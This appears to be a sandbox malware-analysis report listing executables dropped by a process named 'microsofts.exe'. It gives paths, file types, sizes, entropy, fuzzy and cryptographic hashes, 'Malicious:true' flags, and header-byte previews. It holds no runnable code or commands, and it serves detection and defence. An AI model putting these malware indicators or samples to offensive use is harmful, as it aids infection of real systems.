Malicious:true
Reputation:unknown

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):2168832
Entropy (8bit):7.940563311911797
Encrypted:false
SSDEEP:49152:Xy53w24gQu3TPZ2psFkiSqwozlDmg27RnWGj:XyFQgZqsFki+ozlD527BWG
MD5:07511574717C864659E15057239367AE
SHA1:1A341E8FE754F889BE796C30D1F5667AEA2750A0
SHA-256:BBBA974166F82F114025805CBAC1AB355C82B92B9C58AA344CC6E11AA5CD1D61
SHA-512:04006564310BE18948E40035EEA1AE354A186B85F413F747CCB9DC80DFF3BF854B06CC66DDC03451CB2DD73BCA35944C6834FE8DD91408C26355FBC2DAEEB9FD
Malicious:true
Reputation:unknown

Process:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):3141
Entropy (8bit):4.844763378727272
Encrypted:false
SSDEEP:24:Idn0+RZWtcWmIUOyWqiNzWlbvW07SqWqNW36Wcv+l6gMKW0a:Ii+RE5mny3NiUlqA3tnWD
MD5:A997FF94A57F8F9105350C488EFCA97D
SHA1:A78B8A5F1D106816EF4F55D27B85BA4F3CE5D1C5
SHA-256:DCF2D5DC2BE5179F61CB707A97A87586E005F467B11FFA45841FEAE8E40A1230
SHA-512:6A92C907FA5A49BDD7291015A669F0A2C532D26D9BA3A11DD5ECFB74651CA01BD21071CCD0BFEDE22D045AB0D4833955B71ABA25BE27F4020FD1B6B1D740657F
Malicious:false
Reputation:unknown
Preview:2024-11-05 11:02:58-0500: Disabled unneeded token privilege: SeAssignPrimaryTokenPrivilege...2024-11-05 11:02:58-0500: Disabled unneeded token privilege: SeAuditPrivilege...2024-11-05 11:02:58-0500: Disabled unneeded token privilege: SeBackupPrivilege...2024-11-05 11:02:58-0500: Disabled unneeded token privilege: SeCreateGlobalPrivilege...2024-11-05 11:02:58-0500: Disabled unneeded token privilege: SeCreatePagefilePrivilege...2024-11-05 11:02:58-0500: Disabled unneeded token privilege: SeCreatePermanentPrivilege...2024-11-05 11:02:58-0500: Disabled unneeded token privilege: SeCreateSymbolicLinkPrivilege...2024-11-05 11:02:58-0500: Could not disable token privilege value: SeCreateTokenPrivilege. (1300)..2024-11-05 11:02:58-0500: Disabled unneeded token privilege: SeDebugPrivilege...2024-11-05 11:02:58-0500: Could not disable token privilege value: SeEnableDelegationPrivilege. (1300)..2024-11-05 11:02:58-0500: Disabled unneeded token privilege: SeImpersonatePrivilege...2024-11-05 11:02:5

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1356800
Entropy (8bit):5.34783915182234
Encrypted:false
SSDEEP:24576:+QVTZu0J1sqjnhMgeiCl7G0nehbGZpbD:lVTZu0Dmg27RnWGj
MD5:7BBB6DB310D239DA8D65A687C939EAA5
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:527FA0419D9C713C4FD309A212C2717247CCB565
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:F7DBE565C72A8193883449781461F5C1E3B8129FDBC4E02143C2E67DCA492372
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:0CC41D413BCBAD3C201E5E99C1E319B499F786C7E7D97D196A4390C6FA5292A4FDF8A519CB67314A0A52E94E7A2FDC75AE1BD073B672D32D9392DBBF9D54EA0E
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......R...$.................@.............................P............ .................................................h&..................`....................$..........................(....p..8............,...............................text...FQ.......R.................. ..`.rdata.......p.......V..............@..@.data...4#...`.......<..............@....pdata..`............J..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl.*............h.................._RDATA...............j..............@..@.rsrc................l..............@..@.reloc...P.......@...t..............@...........................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1683968
Entropy (8bit):5.623122327004064
Encrypted:false
SSDEEP:24576:f+gkESfh4Co2sqjnhMgeiCl7G0nehbGZpbD:WgkE+SoDmg27RnWGj
MD5:6BD1B03266806CC18E168423DC3913B1
SHA1:32FBFA89F107F5AC5A89ADFE9CF91EF02AD7279C
SHA-256:60E7D4C58107C70FB74AD88CACB0A11E02019407EDDA9CE90A11936E888EF91D
SHA-512:42392C1501C8C48685336CFD6E6662EAB69B4B97A189432E36B461347A15F8F0544D12097692CE337B1F5B9C48D5CADA9875F2FD2EC97D338AD5B0D8CE4E546D
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............xaX.xaX.xaX...X.xaX...X.xaX.x`XlxaX...X.xaX..eY.xaX...X.xaX`.bY.xaX...X.xaX...X.xaXRich.xaX........................PE..d....\.d.........."...........................@.............................. .......c.... .....................................................x............@...q......................................................................0............................text...v........................... ..`.rdata..T...........................@..@.data....-..........................@....pdata...q...@...r..................@..@.rsrc................j..............@..@.reloc...P.......@...r..............@...........................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1532416
Entropy (8bit):7.096636761645392
Encrypted:false
SSDEEP:24576:6BpDRmi78gkPXlyo0Gtjr9sqjnhMgeiCl7G0nehbGZpbD:eNRmi78gkPX4o0Gtj9Dmg27RnWGj
MD5:D3659BE3E49A91C5A45D9108E5A47E1C
SHA1:D807730FFF24093C88AB1F618FA6EA10D1C710EA
SHA-256:AF810E057E73AEDB2DF96F6D10EC115F5A9CBBFB008EAED29B17F0BF4B18E9FF
SHA-512:B5A2077349A82C1248A26328FBABBDFEB44DE565F822F09DF82098D3FAF7F1D323F87323F712459E6BCCDE2624479FCFD26639D2902613519A5B9B77EA6630A0
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........\..2..2..2.0.\..2..I..2..3..2..O..2..\.D.2...6..2.._..2..N..2..J..2.Rich.2.........................PE..d....\.d.........."......b...8......Pi........@.....................................t..... .................................................P................... .......................................................................(.......@....................text....a.......b.................. ..`.rdata...i.......j...f..............@..@.data...............................@....pdata.. ...........................@..@.rsrc...............................@..@.reloc...............r..............@...........................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1282048
Entropy (8bit):7.229044767852432
Encrypted:false
SSDEEP:24576:rLOS2oTPIXV2sqjnhMgeiCl7G0nehbGZpbD:V/T1Dmg27RnWGj
MD5:D59B464FF439563CC8C1B5F5F5FC850F
SHA1:E19137B901E3F29EBF2FBC672EF73A65626243C6
SHA-256:9188B53B862E70B0BA48AF2AB8D13ED18FA66B21FFADD87B2929CE5697E85492
SHA-512:4AE527A7DE2C13705B0ABD55DAF55F200D806ECB27F686971A28B0C7B8E355585D67D24F712DB9126FB7098A05D2182E3733EEFD3E14E20F73F8AEA4D3C348D9
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;.VS.y8..y8..y8...C.jy8..y9..y8...E.}y8...V..y8.i.<.~y8...U.ky8...;.~y8...D.~y8...@.~y8.Rich.y8.........PE..d....\.d.........."......&..........."........@......................................i.... ..............................................................d...........................................................................@...............................text...4$.......&.................. ..`.rdata..Ts...@...t...*..............@..@.data...83..........................@....pdata..............................@..@.rsrc....d.......f...:..............@..@.reloc..............................@...........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1145344
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.03119442769536
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
SSDEEP:12288:s1cXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:s1csqjnhMgeiCl7G0nehbGZpbD
MD5:4247B9C0FFA0B63552F47580B682405F
SHA1:72DDEE350C0568E44F2F064B1718D7B5D117A9C9
SHA-256:AE1C9C586185459FD96B7310638F0AF8FD0AB28AA202851550D228948897E335
SHA-512:67D64273CE936BDCC5CD7E91D424EA35C25F4066D5ABE476686AE1164208E6F4AF5D917F32CC2F676AB0568EB3ACCB3B56E1006CF526D11CDBDC76BACAF9FD6B
Malicious:true
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1222656
Entropy (8bit):6.712018958656891
Encrypted:false
SSDEEP:12288:iRudzDXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:iAdzDsqjnhMgeiCl7G0nehbGZpbD
MD5:A5056C674D94C49DCC978651C0823091
SHA1:4B71E105ADC1F1C40B946FDB23AD262D4D5C1E4A
SHA-256:0DDBA6551C28CBD575A1EAACFA3B41A1713BABC26CA549D0962C9B8F7051F8AC
SHA-512:B9393B2B8E3C83AEAA6341339E91EB484A0AD739059A0BF9543F170FF7109E0D6AED25601203DA009F1142B606D5A1EC300AAF4C6FBE752B20817FC9342626A4
Malicious:true
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1457664
Entropy (8bit):5.082150463486846
Encrypted:false
SSDEEP:12288:Xv3Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:vsqjnhMgeiCl7G0nehbGZpbD
MD5:B84BE6DE9A91A34B04E9B962C1D092E2
SHA1:720CCE8D8B688681AF1DBD46FEC967C20FA9F391
SHA-256:642DA68FDEA360D38243730563142E30DC48D00E4EDDF2BD332BFC8C49026A7E
SHA-512:14666DB3602C7A048BFFD328CF1A51F7DAB1D8036B6249CC470D10F65DF4F89F1D7E1FE5749B1DEA9DD05715F57027F997A891B12936C3CA73AD4A53F306FA77
Malicious:true
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1461248
Entropy (8bit):5.468610482197607
Encrypted:false
SSDEEP:24576:75zhM1XSEisqjnhMgeiCl7G0nehbGZpbD:PMsHDmg27RnWGj
MD5:7A2E793BE84333B854166922E53DAF55
SHA1:C8CFAC04C7A6D76FD2A777A45527517EC1C34B48
SHA-256:34A532A2089F443BDDD02CFD1F20B97DA7B6A23BBFD29D26B9A6E1D95E01C0A8
SHA-512:AC7CF696D11E3FB7A93B1B1E375AB78CC4A4730DE08A8ACB68D0BF8B1E7F734E54CF75B9A188D451D2361A71AEC9F5CEE7D85BB46A21AE9425B171C90CD2DFC2
Malicious:true
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):4151808
Entropy (8bit):6.499775997976205
Encrypted:false
SSDEEP:49152:NtuUC0nNc/RcYHCY9AWWnURqdHIEogMAYrukdUmSC+bXMZQU1QqpN755JDmg27RN:NjEIa4HIEWOc5TD527BWG
MD5:BE9FE51EA455F6BF34C50A7F15EA5ECA
SHA1:4AD0443D31EA05EE610F2A0AE5A17474EF784458
SHA-256:DFC3135CDC2D39FFF4B93D7DDC6555439AA6D3A8EADD971E194226A7CC56F561
SHA-512:677F3E22140B306779C7DA335D1C8E1C0A37796217800E3AD893C992A16068414285B130489CE5CB37A4716D4DDD400BC068368806AB98F761C4132094753CC6
Malicious:true
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):59941376
Entropy (8bit):7.999367311925371
Encrypted:true
SSDEEP:1572864:WQb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAs:1XhwMhe6AABPiQwF6xQ22R
MD5:6DCE356FE7DF61A6D00B250D362E416B
SHA1:724F47D87010D8F3E20E5EAE9EE50E4EF47A08AD
SHA-256:16A0BEB00EE61F8AE8D485AB199B8F543B8B3695B73508662CF2694FC27C5CCE
SHA-512:EC4C032E5E8B3F7BFBD1A2C5A834E1FBE90359CA6014AB7827A043CEEB982015DD6A332C8FDB5D960DCB55864101E0B9DF5E941BB570DC6A1B4CEB9106542BCC
Malicious:true
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1180160
Entropy (8bit):5.084800476175956
Encrypted:false
SSDEEP:12288:tWHXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:tysqjnhMgeiCl7G0nehbGZpbD
MD5:8E8EDB21C2C7590FBD1077F6F039E925
SHA1:BCE6451E67BD39BB637414AF4D4B3895683F3308
SHA-256:69CB56310C5E88477F2C0612CF1AD353C0DCEB588F69AF93590DDF3E29FD2AEB
SHA-512:013E8811958DF19938FB2EBC43242E5D735D85FD9B51F6F3BA8DB0067155FD186BCB16A9B466CD75144692DC7CBFCEC3EDBBACB5FA30C1AFBEE46EDD526BF2EA
Malicious:true
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):6210048
Entropy (8bit):6.3866997428856
Encrypted:false
SSDEEP:49152:8DvZEaFVUn+Dpasot2xQevgjCGT7lmPIionqOgBhGl6zVLkVEk3yV07U24GEQTXV:lnN9KfxLk6GEQTX5UKzNDAD527BWG
MD5:174D67EF3DC25EDE2AE5259D62179FED
SHA1:BC5D6A40208205CF376CCD49804806191EFB1ED7
SHA-256:AEAE80805DD8BF161392EA3BAB6E166A24265FD853A17F0EAFD64BA9EB07F7EF
SHA-512:298B38855C90859B57EC36DCC974FC83874218D9BF0129162A6C2DD151DDD6A8BA3C92922643C4E5F447A34A7941DDCDD984C56291D69D8AE2CCBC3E4C2D58CC
Malicious:true
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1157120
Entropy (8bit):5.041486249040633
Encrypted:false
SSDEEP:12288:L6Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:L6sqjnhMgeiCl7G0nehbGZpbD
MD5:C07E22E815860C387D769AB029EC4571
SHA1:3298820A1DC3A39B00888FE15B085448A45896B0
SHA-256:6478BC688C2091E99FA940FC215F90323047DEC62E1C57AB06AAD3F755687694
SHA-512:1A06A82B722D89B56DC63509392CBC860C9D9625F61EB8D241965AE280FCEAC5C4A448570FD89A047DB3EB2E23840F3EA10986DDE1784CD9FE52E7ECA058D1FF
Malicious:true
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):12039168
Entropy (8bit):6.5966745323791045
Encrypted:false
SSDEEP:98304:rb+MzPstUEHInwZk3RBk9DdhgJCudq1uVIyESYgKZD527BWG:XnPgTHIwZoRBk9DdhSUEVIXgKZVQBWG
MD5:6E8DD2A65C4F5C7A2FE57593AF4F8AFA
SHA1:25F4A978DE6C8A0BCF9582B6BCD22E05DC7A821C
SHA-256:A7D1BD614DAC605CA1626DF17E5A21552DFC5056934E149385D6E00EFD6D8F56
SHA-512:AC6AED4CC7C5317134860C3AF5A1938CE67713A382B7C8C8CF579A776ADEFEE1941845ECC6CB6F657260C51C569178086364F284239D210A7A4B8BE59CD6BA47
Malicious:true
Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......&.w.bb..bb..bb..v...lb..v...b.....qb.....hb......ab......b..E.t.Vb..E.d.jb.....ib......b..v...|b..v...cb.....`..bb..}b..v...Ab..bb..,`.....b.....cb.....cb..bb..`b.....cb..Richbb..........PE..d......d..........".........../.....0.F........@......................................... ............................................\...,..h........G......Lz..................P..T......................(......8...........................................text............................... ..`.rdata..f. .......!.................@..@.data..............................@....pdata..Lz.......|.................@..@.didat...............X..............@..._RDATA...............Z..............@..@.rsrc....G.......H...\..............@..@.reloc... .........................@...........................................................................................
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1322496
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.281815901423947
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:Eg5FvCPusVsqjnhMgeiCl7G0nehbGZpbD:hftqDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:5B9C0B4ED2C16380AD6E7D584DAEB5EF
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2D8BCCFC85FA6C26F7CAEFB84B96BFBD892FB8AD
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:730932ACB4842A7C4D887D1972A177D9C5D36D1AD88F85BC22A439D84E06119E
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:92337951C00D3D9F6CB6FE00442FB3C3AB6F562D1A86E7E7202324FA507CB7C1386794BA4FAAF2A78BCA4F2084009A5955CA8C95475AA99CCB7F5C0373EF3B9B
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ z.A...A...A...9...A..O5...A..O5...A..O5...A..O5...A...*...A...A...@..M5...A..M5.A...A...A..M5...A..Rich.A..................PE..d......d.........."..........b.................@.............................p......5..... .................................................X...h....p..p....P..t.......................T.......................(.......8............................................text...,........................... ..`.rdata.............................@..@.data........@.......&..............@....pdata..t....P......................@..@.rsrc...p....p.......B..............@..@.reloc...P... ...@..................@...................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1339904
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.2088716458489115
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:MjKTIsAjFuvtIfmFthMaT5U8aChaeu7sqjnhMgeiCl7G0nehbGZpbD:MjIMmPh7TT79yDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:6FC734EFE8B446480330C66AA2078191
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:AADB786A292246A3FF82CB435FD4ADE46E2E8FEF
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:A5F21BC747FC2A825DB901BCAF4EA17E90452ACFDCA1CEE9C8C7198ABEDCEEEE
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:C0E779AC90B223DAA3ED6D3357843DFE6F6C7A035201FBC75D1693EBADB8B5D7FF57A2900754977E580B53313D28B7E0B6136D19D443FD097C3AB77273479899
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$......................................s...X............................[....U=....................h...n......n.Y.....1....n......Rich...........PE..d......c..........".................0i.........@..............................$........... .................................................H...d............@..Tx......................p...................`...(...`................................................text............................... ..`.rdata..@...........................@..@.data....>......."..................@....pdata..Tx...@...z..................@..@.rsrc................z..............@..@.reloc..............................@...................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1515520
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.411767438157768
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:gGqVwCto1Gm5WgXsqjnhMgeiCl7G0nehbGZpbD:tZ1GmUQDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:92D7F92DECEA39CE9978B09AFE49DA33
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:1F6608545123AFA2A2A15D6344FA39691F3C0765
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:021814A22F523CB3F1F3D73C1E64363551501B171E1D5A7FE4F79FA79D72C29F
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:7A10C4B26B4624FCC5F887CAF4482F1EA6DE198FEBF4E0BC8085724C4D1602B36A742A658FD9DC09C28974DCC17EDD41374E0D64AE770B91C0BFECD69175A953
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................v......................................a..X.....X........r....X.....Rich...........PE..d......c.........."............................@.......................................... .................................................. ...........v..............................p.......................(....................0...............................text............................... ..`.rdata..Z$...0...&..................@..@.data...x"...`.......@..............@....pdata...............L..............@..@.rsrc....v.......v...j..............@..@.reloc...P...0...@..................@...................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1253376
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.157409869859376
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:wWBWbXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:wWBWbsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:5F6113C0099A6204290DA6646483BE06
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2A09AF117F5E87A0AD473F5CDD7CBCD4D17E0711
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:FBC08519308062697B16F950F331E99946C6F9AFED3C236CEA7E7AF016BC4FEA
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B3CF01E2BA5220E225CD564749C8E237AC2BBEB47AEFA84B7D0E100DC24971FE2F2FBF0B63DB148E50A493945463021F193A864EBF908BD83C19D1E64BAB1FD5
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1.v.Pc%.Pc%.Pc%.(.%.Pc%C$g$.Pc%C$`$.Pc%C$f$.Pc%C$b$.Pc%.;g$.Pc%.;b$.Pc%.Pb%EPc%z$f$.Pc%z$.%.Pc%.P.%.Pc%z$a$.Pc%Rich.Pc%................PE..d...DC,d.........."............................@.............................`......"O.... .................................................h...@.......@............................Q..T....................S..(... R..8............0...............................text............................... ..`.rdata..$....0......................@..@.data...............................@....pdata..............................@..@.rsrc...@...........................@..@.reloc...P.......@..................@...........................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1683968
Entropy (8bit):7.228485020668229
Encrypted:false
SSDEEP:24576:Gf9AiKGpEoQpkN2C4McuKo0GTNtpyT5RGeQa04sqjnhMgeiCl7G0nehbGZpbD:G+GtCi27mVTyT+a0kDmg27RnWGj
MD5:C1CC2720E37251D6B5745658788DEEC3
SHA1:C8FE015C06A69AC61D6C5395891469DFF455F74A
SHA-256:19B8746518442B954DCA7DED15F402207B0BE0664E955C16A3685BA08AA7DF86
SHA-512:9883BC29A98C8623BB75975B3D7842C71F5D2022CEE90776D41A57A9F4FDF1FCBA4BE57FAD7C4D01E5FBC9B92A744B7DAC4E41D7DD893340FC03ECC00F1EE6C8
Malicious:true
Reputation:unknown
Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........ ..N...N...N......N.e.K...N...O...N...J...N...M...N...H...N...K...N...#...N.<~3...N..C3...N...O...N...O.O.N...F...N.......N......N...L...N.Rich..N.................PE..d...%..c.........."......j...t......@..........@.....................................j.... .................................................x........... ....p..dt......................p.......................(... ...8............................................text...kh.......j.................. ..`.rdata...............n..............@..@.data...`S.......F..................@....pdata..dt...p...v...D..............@..@.rsrc... ...........................@..@.reloc..............................@...........................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):3110912
Entropy (8bit):6.6496623632989476
Encrypted:false
SSDEEP:49152:CU198PzqkltcT0gViJNfBZQiOIK5Ns6YZ82PTJeYzDmg27RnWGj:H2NfHOIK5Ns6qR9lD527BWG
MD5:DA64A3C3AE6B00948D203268393E3470
SHA1:E1D0E6F7F32B30F8D98D9A50656836F096ADE983
SHA-256:E115549D223A54FE02E1A5F9811F54AEAC95C95FD40CEB61354AF6E0EF8EB4A4
SHA-512:A9CDEBA3C9DFAB8B6554AD69FCF701C959D9C968392F7B741EE0FFAD84D09FA87035E6AAA1298051703F1F5C71C3830324F0FF18E7AF733C57566208FE2A841D
Malicious:true
Reputation:unknown
Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......'A3rc ]!c ]!c ]!..!h ]!..!. ]!..!x ]!1UY r ]!1U^ i ]!.O.!a ]!..!g ]!..!b ]!1UX . ]!..!@ ]!.UX . ]!c \!.!]!.UT . ]!.U.!b ]!c .!b ]!.U_ b ]!Richc ]!................PE..d.....Zd..........".................t..........@..............................0......m0... ..................................................o .......&......$.`....................x..p....................y..(....)..8....................j .@....................text............................... ..`.rdata..8...........................@..@.data....q.... ..<...r .............@....pdata..`.....$.......#.............@..@_RDATA........&.......%.............@..@.rsrc........&.......%.............@..@.reloc...@....&..0...H&.............@...................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1588224
Entropy (8bit):5.531910522660362
Encrypted:false
SSDEEP:24576:ykcWTUQcydnsqjnhMgeiCl7G0nehbGZpbD:yhKUcDmg27RnWGj
MD5:4DA953BFC7F31426E9DEB30A389F3F39
SHA1:18B23EF547A003006DF461A55F74EB6CB54908DB
SHA-256:1FBB4EDECF68B2FF3FF9A99D1E34601D0E322358099BD7FBF200CF9D813EE982
SHA-512:25EB554C8A9780C5E11BAE04CB970EBB4F2833D2DCEE241DCFC9E342D0F87A12AAE9CE1DC247E46EC7D2D59970D16A4DEFCA52888A58BE18D1D15E14B7E76C1C
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0I..Q'..Q'..Q'..7#..Q'..7$..Q'..7".!Q'..$#..Q'..$$..Q'..7&..Q'..$"..Q'.x$"..Q'..Q&.dQ'.x$...Q'.x$...Q'..Q...Q'.x$%..Q'.Rich.Q'.........................PE..d.....Zd.........."......,..........(?.........@.....................................b.... .................................................(...P................m..................tC..p...........................p...8............@..........@....................text....+.......,.................. ..`.rdata......@.......0..............@..@.data....)..........................@....pdata...m.......n..................@..@_RDATA...............B..............@..@.rsrc................D..............@..@.reloc...`...@...P..................@...................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1338368
Entropy (8bit):5.3526507327361506
Encrypted:false
SSDEEP:12288:5fY+FUBoXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:5A+qBosqjnhMgeiCl7G0nehbGZpbD
MD5:957CE736BE03014E05BF4172AE2748A1
SHA1:CC2EC588C64AA875F492F1841F694B080C09F4C6
SHA-256:4DF9DDD0BECA46C48A01DA67BAF7C45E54CA7463D810012E528D4E004DCB0A9D
